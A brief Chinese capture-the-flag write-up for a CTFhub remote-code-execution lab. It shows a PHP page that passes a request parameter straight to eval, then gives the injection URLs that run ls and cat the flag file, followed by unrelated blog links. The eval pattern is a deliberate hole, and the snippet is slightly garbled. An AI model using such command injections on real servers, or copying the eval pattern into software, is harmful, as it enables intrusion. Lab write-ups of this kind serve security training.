CTFhub-RCE-evel执行

访问目标地址:

<?php

if (isset($_REQUEST'cmd')) {

eval($_REQUEST"cmd");

} else {

highlight_file(FILE);

}

?>

根据PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!

没有需要的文件

看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!

打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!

相关推荐
cidy_9811 小时前
codebase-memory-mcp 安装教程
前端
mt_z12 小时前
Webpack 与 Vite 完全指南
前端
灏仟亿前端技术团队12 小时前
B 端多弹窗越来越难维护?试试把弹窗交互 Promise 化
前端
奇奇怪怪的12 小时前
向量数据库选型与生产级实战
前端
徐小夕13 小时前
jitword 协同文档3.2发布:打造浏览器中最强word编辑器
前端·架构·github
人活一口气14 小时前
从JVM调优到MCP协议:Java全栈技术体系深度总结与企业级架构实践
java·spring boot
纯爱掌门人14 小时前
干了这么多年前端,聊聊 2026 年我们到底还值不值钱
前端·程序员
houhou14 小时前
Monaco Editor 集成指南:从配置到优化
前端
hunterandroid14 小时前
[Android 从零到一] Custom View 自定义绘制:从 onDraw 到完整交互
前端
李明卫杭州14 小时前
Vue3 v-memo 指令详解:让你的列表渲染性能翻倍 🚀
前端